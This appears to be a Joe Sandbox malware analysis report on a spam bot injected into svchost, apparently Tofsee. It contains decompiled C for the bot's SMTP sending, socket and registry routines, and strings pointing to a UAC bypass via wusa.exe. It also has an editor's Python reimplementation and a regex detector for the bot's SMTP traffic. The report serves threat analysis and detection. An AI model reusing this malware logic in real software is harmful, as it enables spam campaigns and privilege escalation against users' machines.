                                                                                                                                  							__cl =  *__eax;
                                                                                                                                  							__eax = __eax + 1;
                                                                                                                                  							__eflags = __cl;
                                                                                                                                  						} while (__cl != 0);
                                                                                                                                  						goto L9;
                                                                                                                                  					case 0xa:
                                                                                                                                  						__eax = _a12;
                                                                                                                                  						_t15 = __eax + 1; // 0x1
                                                                                                                                  						__edx = _t15;
                                                                                                                                  						do {
                                                                                                                                  							__cl =  *__eax;
                                                                                                                                  							__eax = __eax + 1;
                                                                                                                                  							__eflags = __cl;
                                                                                                                                  						} while (__cl != 0);
                                                                                                                                  						L9:
                                                                                                                                  						__eax = __eax - __edx;
                                                                                                                                  						 *((char*)(__ebp + __eax - 0x80)) = 0;
                                                                                                                                  						L20:
                                                                                                                                  						_t131 = _t131 + 0xc;
                                                                                                                                  						goto L21;
                                                                                                                                  				}
                                                                                                                                  			}
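The switch above is the sample's SMTP command builder: case 1 formats "helo %s" or "ehlo %s" depending on the global at 0x2523668, cases 2 and 3 format the lower-case "mail from:<%s>" and "rcpt to:<%s>" lines, cases 4, 6 and 8 copy the fixed strings "data", "quit" and "AUTH LOGIN" via E0251EE08 with lengths 7, 7 and 0xd (each is strlen + 1, so the helper is consistent with a memcpy including the NUL), and the code before the switch sends the 5-byte end-of-data marker "\r\n.\r\n" and reports "Error sending command (sent = %d/%d)" when send() returns anything other than 5. The following is an added Python re-expression of that builder written by the editor for readability; it is not code from the sample or from Joe Sandbox. Assumptions not on the page: `use_ehlo` stands in for the global at 0x2523668, the envelope order in `envelope_transcript` is standard SMTP order (this excerpt shows per-state formatting, not the driver loop), cases 9 and 0xa are left out because only their strlen and NUL-terminate steps are visible here, and `tofsee_style_commands` is a triage heuristic keyed on the exact casing and spacing seen in the strings, not a tested signature.

```python
# Added example (editor's reimplementation, not code from the analysed sample).
import re
from typing import Callable, List, Optional

END_OF_DATA = b"\r\n.\r\n"  # sent with length 5; the sample compares the result with 5
ERROR_FMT = "Error sending command (sent = %d/%d)\n"  # format string present in the sample


def build_smtp_command(state: int, arg: str = "", use_ehlo: bool = False) -> Optional[bytes]:
    """Bytes the decompiled switch formats for `state` (the case number).

    Returns None for cases that only transition in this excerpt (0, 5, 7) and for
    9 / 0xa, where the copy itself is outside the excerpt.
    """
    if state == 1:
        # global at 0x2523668: zero -> "helo", non-zero -> "ehlo" (use_ehlo is our stand-in)
        fmt = "ehlo %s\r\n" if use_ehlo else "helo %s\r\n"
        return (fmt % arg).encode("ascii")
    if state == 2:
        return ("mail from:<%s>\r\n" % arg).encode("ascii")
    if state == 3:
        return ("rcpt to:<%s>\r\n" % arg).encode("ascii")
    if state == 4:
        return b"data\r\n"        # copied with length 7 = strlen + NUL
    if state == 6:
        return b"quit\r\n"        # copied with length 7 = strlen + NUL
    if state == 8:
        return b"AUTH LOGIN\r\n"  # copied with length 0xd = strlen + NUL
    return None


def send_checked(send: Callable[[bytes], int], data: bytes) -> Optional[str]:
    """Mirror the post-send check: send() must report exactly len(data) bytes.

    Returns None on success, otherwise the error text the sample would format
    into its message buffer (_a16 in the decompiled output).
    """
    sent = send(data)
    if sent == len(data):
        return None
    return ERROR_FMT % (sent, len(data))


def envelope_transcript(helo_name: str, sender: str, recipients: List[str],
                        body: bytes, use_ehlo: bool = False) -> bytes:
    """Client-side bytes of one delivery in standard SMTP order (order is an
    assumption; the excerpt shows per-state formatting, not the driver loop)."""
    parts = [build_smtp_command(1, helo_name, use_ehlo), build_smtp_command(2, sender)]
    parts += [build_smtp_command(3, r) for r in recipients]
    parts += [build_smtp_command(4), body, END_OF_DATA, build_smtp_command(6)]
    return b"".join(parts)


# Exact forms produced by the builder: lower-case verbs, no space after the colon
# in "mail from:" / "rcpt to:", but upper-case "AUTH LOGIN". Heuristic only
# (assumption): ordinary clients usually send these upper-case with a space.
_TOFSEE_FORMS = re.compile(
    rb"^(?:helo [^\r\n]+|ehlo [^\r\n]+|mail from:<[^>\r\n]*>|rcpt to:<[^>\r\n]*>"
    rb"|data|quit|AUTH LOGIN)\r\n",
    re.M,
)


def tofsee_style_commands(client_stream: bytes) -> List[bytes]:
    """Command lines in a client->server stream that match the builder's exact
    casing and spacing; an empty list means nothing in the stream looks like it."""
    return [m.group(0) for m in _TOFSEE_FORMS.finditer(client_stream)]


if __name__ == "__main__":
    # Constructed sample session (not captured traffic).
    session = envelope_transcript("host.example", "a@example.invalid",
                                  ["b@example.invalid"], b"Subject: x\r\n\r\nhi")
    for line in tofsee_style_commands(session):
        print(line)
    print(send_checked(lambda d: 3, END_OF_DATA))
```

The `send_checked` wrapper is the part worth noting during triage: the sample treats a short send as a hard error and formats the exact string "Error sending command (sent = %d/%d)", so that string in memory or in a dropped log is a usable pivot back to this routine.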

[Instruction-address gutter for the decompiled function above: 0x0251a7cb through 0x0251ab4a, with 0x00000000 where a line has no address. The per-line alignment was lost in extraction.]
                                                                                                                                  0x0251aacc
                                                                                                                                  0x0251aacc
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aacc
                                                                                                                                  0x0251aaa2
                                                                                                                                  0x0251aaa9
                                                                                                                                  0x0251aaab
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aaad
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aaad
                                                                                                                                  0x0251aa59
                                                                                                                                  0x0251aa5f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa61
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa61
                                                                                                                                  0x0251aa06
                                                                                                                                  0x0251aa0c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa0e
                                                                                                                                  0x0251aa14
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa16
                                                                                                                                  0x0251aa1c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa1e
                                                                                                                                  0x0251aa24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa26
                                                                                                                                  0x0251aa2c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa2e
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa2e
                                                                                                                                  0x0251a9db
                                                                                                                                  0x0251a8c8
                                                                                                                                  0x0251a8d2
                                                                                                                                  0x0251a8d4
                                                                                                                                  0x0251a8d6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a8e2
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a8eb
                                                                                                                                  0x0251a89c
                                                                                                                                  0x0251a8af
                                                                                                                                  0x0251a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a89c
                                                                                                                                  0x0251a7df
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a7ed
                                                                                                                                  0x0251a7f0
                                                                                                                                  0x0251a7f3
                                                                                                                                  0x0251a803
                                                                                                                                  0x0251a7f5
                                                                                                                                  0x0251a7f5
                                                                                                                                  0x0251a7f5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a845
                                                                                                                                  0x0251a848
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a852
                                                                                                                                  0x0251a855
                                                                                                                                  0x0251a84d
                                                                                                                                  0x0251a84d
                                                                                                                                  0x0251a7fa
                                                                                                                                  0x0251a7fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a85c
                                                                                                                                  0x0251a85e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a86a
                                                                                                                                  0x0251a86c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a80a
                                                                                                                                  0x0251a80c
                                                                                                                                  0x0251a871
                                                                                                                                  0x0251a871
                                                                                                                                  0x0251a874
                                                                                                                                  0x0251a875
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a813
                                                                                                                                  0x0251a816
                                                                                                                                  0x0251a816
                                                                                                                                  0x0251a819
                                                                                                                                  0x0251a819
                                                                                                                                  0x0251a81b
                                                                                                                                  0x0251a81c
                                                                                                                                  0x0251a81c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a836
                                                                                                                                  0x0251a839
                                                                                                                                  0x0251a839
                                                                                                                                  0x0251a83c
                                                                                                                                  0x0251a83c
                                                                                                                                  0x0251a83e
                                                                                                                                  0x0251a83f
                                                                                                                                  0x0251a83f
                                                                                                                                  0x0251a820
                                                                                                                                  0x0251a824
                                                                                                                                  0x0251a82f
                                                                                                                                  0x0251a87a
                                                                                                                                  0x0251a87a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

APIs
• wsprintfA.USER32 ref: 0251A7FB
• lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0251A87E
• send.WS2_32(00000000,?,00000000,00000000), ref: 0251A893
• wsprintfA.USER32 ref: 0251A8AF
• send.WS2_32(00000000,.,00000005,00000000), ref: 0251A8D2
• wsprintfA.USER32 ref: 0251A8E2
• recv.WS2_32(00000000,?,000003F6,00000000), ref: 0251A97C
• wsprintfA.USER32 ref: 0251A9B9
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: wsprintf$send$lstrlenrecv
• String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
• API String ID: 3650048968-2394369944
• Opcode ID: 430517b5767246f02a10ec62adf2c49957234757a22d6000103fe607dbc03bbd
• Instruction ID: 20b9b4afa6f7cc4c4f8cfc7e4e4d739208e04d2bc2302f16f48f3160310ed041
• Opcode Fuzzy Hash: 430517b5767246f02a10ec62adf2c49957234757a22d6000103fe607dbc03bbd
• Instruction Fuzzy Hash: 1DA15871A42355BBFF238E64DC85FAE3B6ABB51318F140866F802A60C0DB31994CCB5D
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShellExecuteExW.SHELL32(?), ref: 0251139A
• lstrlenW.KERNEL32(-00000003), ref: 02511571
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: ExecuteShelllstrlen
• String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
• API String ID: 1628651668-1839596206
• Opcode ID: ba1c211d2c61a2bcaa69b127e29715d3f462dd0fa2efca7803880e721da11d97
• Instruction ID: 92cb042bbb2b5a1025206ba676fd9d8b8c270984302ecab5cba023477b358a88
• Opcode Fuzzy Hash: ba1c211d2c61a2bcaa69b127e29715d3f462dd0fa2efca7803880e721da11d97
• Instruction Fuzzy Hash: 87F19EB55087419FE320DF64C888B6ABBE5FB89304F018D5DFA9A97280D774D848CF5A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                  			E02512A62(void* __ecx, intOrPtr* _a12) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				intOrPtr* _v44;
                                                                                                                                  				signed short _v272;
                                                                                                                                  				char _v276;
                                                                                                                                  				long _v280;
                                                                                                                                  				char _v284;
                                                                                                                                  				signed short _v288;
                                                                                                                                  				signed short _v292;
                                                                                                                                  				long _v300;
	long _v304;
	intOrPtr _v308;
	signed short _v324;
	intOrPtr _v332;
	signed short _v336;
	signed int _v340;
	signed int _v344;
	void* _v348;
	signed short _v352;
	signed short _v356;
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr _t53;
	signed short _t66;
	void** _t71;
	void* _t76;
	void* _t77;
	void* _t78;
	signed short _t79;
	intOrPtr* _t81;
	signed short _t82;
	signed short _t83;
	intOrPtr _t86;
	signed int _t88;
	void* _t90;
	long _t91;
	signed short _t92;
	void* _t94;

	_t77 = __ecx;
	_t91 = 0;
	 *_a12 = 1;
	_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
	_t76 = _t50;
	if(_t76 != 0) {
		__imp__#23(2, 2, 0x11, _t78);
		_t79 = _t50;
		_v288 = _t79;
		if(_t79 == 0 || _t79 == 0xffffffff) {
			HeapFree(GetProcessHeap(), _t91, _t76);
			_t53 = 0;
			goto L37;
		} else {
			_v304 = 0;
			while(1) {
				_v300 = _t91;
				if(_v304 != _t91) {
					_push(_t91);
				} else {
					_push(0x100);
				}
				__imp__#9();
				_t50 = E025126FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
				_t94 = _t94 + 0xc;
				if(_t50 != 0) {
					goto L32;
				}
				_t86 = 0xc;
				_t50 =  &_v276;
				_v272 = _t79;
				_v276 = 1;
				_v284 = _t86;
				_v280 = _t91;
				__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
				if(_t50 <= 0) {
					goto L32;
				}
				_t50 = E0251EE2A(_t77, _t76, _t91, 4);
				_t94 = _t94 + 0xc;
				__imp__#16(_t79, _t76, 0x1000, _t91);
				_t92 = _t50;
				_v324 = _t92;
				if(_t92 > 0 && _t92 > _t86) {
					_t81 = __imp__#15;
					_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
					if(_t88 == 3) {
						L34:
						 *_v44 = 2;
						L35:
						HeapFree(GetProcessHeap(), 0, _t76);
						__imp__#3(_v292);
						_t53 = _v308;
						L37:
						return _t53;
					}
					if(_t88 != 2) {
						L16:
						if(_t88 != 0) {
							goto L32;
						}
						_t50 = E02512923(_t77, _t76, _t92);
						_pop(_t77);
						_v336 = _t50;
						if(_t50 == 0) {
							goto L32;
						}
						_v340 = _v340 & 0x00000000;
						_v344 = _v344 & 0x00000000;
						_t82 = _t50;
						_v352 = _t82;
						L20:
						while(1) {
							if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
								L30:
								_t83 =  *_t82;
								_v352 = _t83;
								if(_t83 != 0) {
									_t82 = _v352;
									continue;
								}
								goto L31;
							} else {
								_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
								if(_t90 == 0) {
									L31:
									_t50 = E02512904(_v336);
									if(_v344 != 0) {
										goto L35;
									}
									goto L32;
								}
								E0251EE2A(_t77, _t90, 0, 0x108);
								_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
								_t94 = _t94 + 0xc;
								__imp__#15();
								 *(_t90 + 4) = _t66 & 0x0000ffff;
								_t33 = _t90 + 8; // 0x8
								E02512871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
								_t77 = _t66;
								if( *((char*)(_t90 + 8)) != 0) {
									_t71 = _v344;
									_v344 = _t90;
									if(_t71 != 0) {
										 *_t71 = _t90;
									} else {
										_v348 = _t90;
									}
								} else {
									HeapFree(GetProcessHeap(), 0, _t90);
								}
								_t82 = _v356;
								goto L30;
							}
						}
					}
					_push( *(_t76 + 2) & 0x0000ffff);
					if( *_t81() < 0) {
						goto L34;
					}
					goto L16;
				}
				L32:
				_v308 = _v308 + 1;
				if(_v308 < 2) {
					_t79 = _v292;
					_t91 = 0;
					continue;
				}
				goto L35;
			}
		}
	}
	return 0;
}
                                                                                                                                  0x02512c7f
                                                                                                                                  0x02512bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x02512bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x02512bf3
                                                                                                                                  0x02512c08
                                                                                                                                  0x02512c0c
                                                                                                                                  0x02512c85
                                                                                                                                  0x02512c89
                                                                                                                                  0x02512c93
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512c93
                                                                                                                                  0x02512c12
                                                                                                                                  0x02512c1d
                                                                                                                                  0x02512c21
                                                                                                                                  0x02512c25
                                                                                                                                  0x02512c32
                                                                                                                                  0x02512c3e
                                                                                                                                  0x02512c41
                                                                                                                                  0x02512c4a
                                                                                                                                  0x02512c4b
                                                                                                                                  0x02512c5f
                                                                                                                                  0x02512c63
                                                                                                                                  0x02512c69
                                                                                                                                  0x02512c71
                                                                                                                                  0x02512c6b
                                                                                                                                  0x02512c6b
                                                                                                                                  0x02512c6b
                                                                                                                                  0x02512c4d
                                                                                                                                  0x02512c57
                                                                                                                                  0x02512c57
                                                                                                                                  0x02512c73
                                                                                                                                  0x00000000
                                                                                                                                  0x02512c73
                                                                                                                                  0x02512bd1
                                                                                                                                  0x02512bc9
                                                                                                                                  0x02512b8b
                                                                                                                                  0x02512b90
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512b90
                                                                                                                                  0x02512c95
                                                                                                                                  0x02512c95
                                                                                                                                  0x02512c9e
                                                                                                                                  0x02512ac3
                                                                                                                                  0x02512ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ca4
                                                                                                                                  0x02512ac9
                                                                                                                                  0x02512aae
                                                                                                                                  0x00000000

APIs
• GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,761B4F20), ref: 02512A83
• HeapAlloc.KERNEL32(00000000,?,761B4F20), ref: 02512A86
• socket.WS2_32(00000002,00000002,00000011), ref: 02512AA0
• htons.WS2_32(00000000), ref: 02512ADB
• select.WS2_32 ref: 02512B28
• recv.WS2_32(?,00000000,00001000,00000000), ref: 02512B4A
• htons.WS2_32(?), ref: 02512B71
• htons.WS2_32(?), ref: 02512B8C
• GetProcessHeap.KERNEL32(00000000,00000108), ref: 02512BFB
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Heaphtons$Process$Allocrecvselectsocket
• String ID:
• API String ID: 1639031587-0
• Opcode ID: 86b242a275df9e85afd1a7d6cabdc71c2cd7a924f2496283c16f7827e2b72214
• Instruction ID: be2e8a79df0ea6aff354ab970e65b9ec0fb90ee296d014aaf3c156caad10fad6
• Opcode Fuzzy Hash: 86b242a275df9e85afd1a7d6cabdc71c2cd7a924f2496283c16f7827e2b72214
• Instruction Fuzzy Hash: B361D571904325AFE720AF64DC48B6BBBE8FB99759F010809FE45D7180D7B0D8588BA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
			E0251704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				signed int* _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				signed int _t166;
				int _t196;
				signed int _t204;
				int _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8);
				_t208 = _t207 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
					L21:
					_t96 = E0251EE2A(_t167, 0x25222f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E02516DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0251EED1( &_v64, E02512544(0x25222f8,  &E025206A0, 9, 0xe4, 0xc8));
						_t210 = _t208 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0251EE95( &_v364, E02512544(0x25222f8,  &E0252069C, 4, 0xe4, 0xc8));
							E0251EE2A(_t167, 0x25222f8, 0, 0x100);
							_t211 = _t210 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
                                                                                                                                  									E0251EF00( &_v364,  &_v363);
                                                                                                                                  									_t149 = E0251ED23( &_v364, 0x22);
                                                                                                                                  									_t211 = _t211 + 0x10;
                                                                                                                                  									__eflags = _t149;
                                                                                                                                  									if(_t149 != 0) {
                                                                                                                                  										 *_t149 = 0;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								_t196 = E0251EE95( &_v364, E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8));
                                                                                                                                  								E0251EE2A(_t167, 0x25222f8, 0, 0x100);
                                                                                                                                  								__eflags = _t196;
                                                                                                                                  								if(_t196 != 0) {
                                                                                                                                  									_t119 = E0251ED77( &_v364, _a4);
                                                                                                                                  									__eflags = _t119;
                                                                                                                                  									if(_t119 != 0) {
                                                                                                                                  										 *_t196 = 0;
                                                                                                                                  										_t121 = E0251ED23( &_v364, 0x5c);
                                                                                                                                  										_v8 = _t121;
                                                                                                                                  										__eflags = _t121;
                                                                                                                                  										if(_t121 != 0) {
                                                                                                                                  											_t63 =  &_v8;
                                                                                                                                  											 *_t63 =  &(_v8[1]);
                                                                                                                                  											__eflags =  *_t63;
                                                                                                                                  										} else {
                                                                                                                                  											_v8 =  &_v364;
                                                                                                                                  										}
                                                                                                                                  										_t122 = E02516CAD(_v8);
                                                                                                                                  										__eflags = _t122;
                                                                                                                                  										if(_t122 != 0) {
                                                                                                                                  											_pop(_t204);
                                                                                                                                  											_push(0x8b00007e);
                                                                                                                                  											asm("lock xor esi, 0x55555555");
                                                                                                                                  											_v16 = _t204;
                                                                                                                                  											_t166 = _t204 >> 0x00000008 & 0x000000ff;
                                                                                                                                  											_t123 = E02516C96(_t204);
                                                                                                                                  											__eflags = _t123;
                                                                                                                                  											if(_t123 != 0) {
                                                                                                                                  												L57:
                                                                                                                                  												RegCloseKey(_v12);
                                                                                                                                  												__eflags = _a16;
                                                                                                                                  												if(_a16 != 0) {
                                                                                                                                  													E0251EF00(_a16,  &_v64);
                                                                                                                                  												}
                                                                                                                                  												_t125 = 0;
                                                                                                                                  												__eflags = _v20;
                                                                                                                                  												 *_t196 = 0x2e;
                                                                                                                                  												goto L34;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t166 - 0x40 - 0x3f;
                                                                                                                                  											if(_t166 - 0x40 > 0x3f) {
                                                                                                                                  												goto L57;
                                                                                                                                  											}
                                                                                                                                  											__eflags = (_t204 & 0x000000ff) - 0x10;
                                                                                                                                  											if((_t204 & 0x000000ff) >= 0x10) {
                                                                                                                                  												goto L57;
                                                                                                                                  											}
                                                                                                                                  											_t206 = _a12;
                                                                                                                                  											 *_t196 = 0x2e;
                                                                                                                                  											__eflags = _t206;
                                                                                                                                  											if(_t206 != 0) {
                                                                                                                                  												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
                                                                                                                                  												__eflags = _t136;
                                                                                                                                  												if(_t136 != 0) {
                                                                                                                                  													 *_t206 = 1;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  											_t130 = _a8;
                                                                                                                                  											__eflags = _t130;
                                                                                                                                  											if(_t130 != 0) {
                                                                                                                                  												 *_t130 = _t166;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _a16;
                                                                                                                                  											if(_a16 != 0) {
                                                                                                                                  												E0251EF00(_a16,  &_v64);
                                                                                                                                  											}
                                                                                                                                  											__eflags = _a20;
                                                                                                                                  											if(_a20 != 0) {
                                                                                                                                  												E0251EF00(_a20, _v8);
                                                                                                                                  											}
                                                                                                                                  											_t125 = 0;
                                                                                                                                  											__eflags = _v20;
                                                                                                                                  											goto L34;
                                                                                                                                  										} else {
                                                                                                                                  											RegCloseKey(_v12);
                                                                                                                                  											__eflags = _a16;
                                                                                                                                  											if(_a16 != 0) {
                                                                                                                                  												E0251EF00(_a16,  &_v64);
                                                                                                                                  											}
                                                                                                                                  											 *_t196 = 0x2e;
                                                                                                                                  											goto L33;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  									RegCloseKey(_v12);
                                                                                                                                  									_t96 = 0;
                                                                                                                                  									goto L22;
                                                                                                                                  								} else {
                                                                                                                                  									RegCloseKey(_v12);
                                                                                                                                  									__eflags = _a16;
                                                                                                                                  									if(_a16 != 0) {
                                                                                                                                  										E0251EF00(_a16,  &_v64);
                                                                                                                                  									}
                                                                                                                                  									L33:
                                                                                                                                  									_t125 = 0;
                                                                                                                                  									__eflags = _v20;
                                                                                                                                  									L34:
                                                                                                                                  									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
                                                                                                                                  									L22:
                                                                                                                                  									return _t96;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							RegCloseKey(_v12);
                                                                                                                                  							__eflags = _a16;
                                                                                                                                  							if(_a16 != 0) {
                                                                                                                                  								E0251EF00(_a16,  &_v64);
                                                                                                                                  							}
                                                                                                                                  							_t96 = 1;
                                                                                                                                  							goto L22;
                                                                                                                                  						}
                                                                                                                                  						_t155 = E02516CAD( &_v64);
                                                                                                                                  						_pop(_t167);
                                                                                                                                  						__eflags = _t155;
                                                                                                                                  						if(_t155 == 0) {
                                                                                                                                  							L17:
                                                                                                                                  							E0251EE2A(_t167, 0x25222f8, 0, 0x100);
                                                                                                                                  							_t208 = _t210 + 0xc;
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						_t158 = E0251F1A5( &_v64);
                                                                                                                                  						_t167 = _v32 ^ 0x5e5e5e5e;
                                                                                                                                  						__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
                                                                                                                                  						if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
                                                                                                                                  							goto L23;
                                                                                                                                  						}
                                                                                                                                  						goto L17;
                                                                                                                                  					}
                                                                                                                                  					RegCloseKey(_v12);
                                                                                                                                  					goto L21;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x0251712d
                                                                                                                                  0x0251712f
                                                                                                                                  0x0251712f
                                                                                                                                  0x02517130
                                                                                                                                  0x02517133
                                                                                                                                  0x025171d0
                                                                                                                                  0x025171f4
                                                                                                                                  0x025171f7
                                                                                                                                  0x025171fc
                                                                                                                                  0x025171ff
                                                                                                                                  0x02517203
                                                                                                                                  0x02517227
                                                                                                                                  0x0251722e
                                                                                                                                  0x0251723e
                                                                                                                                  0x0251724c
                                                                                                                                  0x02517251
                                                                                                                                  0x02517254
                                                                                                                                  0x02517256
                                                                                                                                  0x02517258
                                                                                                                                  0x02517258
                                                                                                                                  0x02517256
                                                                                                                                  0x02517280
                                                                                                                                  0x02517282
                                                                                                                                  0x0251728a
                                                                                                                                  0x0251728c
                                                                                                                                  0x025172c2
                                                                                                                                  0x025172c9
                                                                                                                                  0x025172cb
                                                                                                                                  0x025172e6
                                                                                                                                  0x025172e8
                                                                                                                                  0x025172ef
                                                                                                                                  0x025172f2
                                                                                                                                  0x025172f4
                                                                                                                                  0x02517301
                                                                                                                                  0x02517301
                                                                                                                                  0x02517301
                                                                                                                                  0x025172f6
                                                                                                                                  0x025172fc
                                                                                                                                  0x025172fc
                                                                                                                                  0x02517307
                                                                                                                                  0x0251730d
                                                                                                                                  0x0251730f
                                                                                                                                  0x02517338
                                                                                                                                  0x02517339
                                                                                                                                  0x0251733e
                                                                                                                                  0x0251734b
                                                                                                                                  0x0251734e
                                                                                                                                  0x02517354
                                                                                                                                  0x0251735b
                                                                                                                                  0x0251735d
                                                                                                                                  0x025173d5
                                                                                                                                  0x025173d8
                                                                                                                                  0x025173de
                                                                                                                                  0x025173e2
                                                                                                                                  0x025173eb
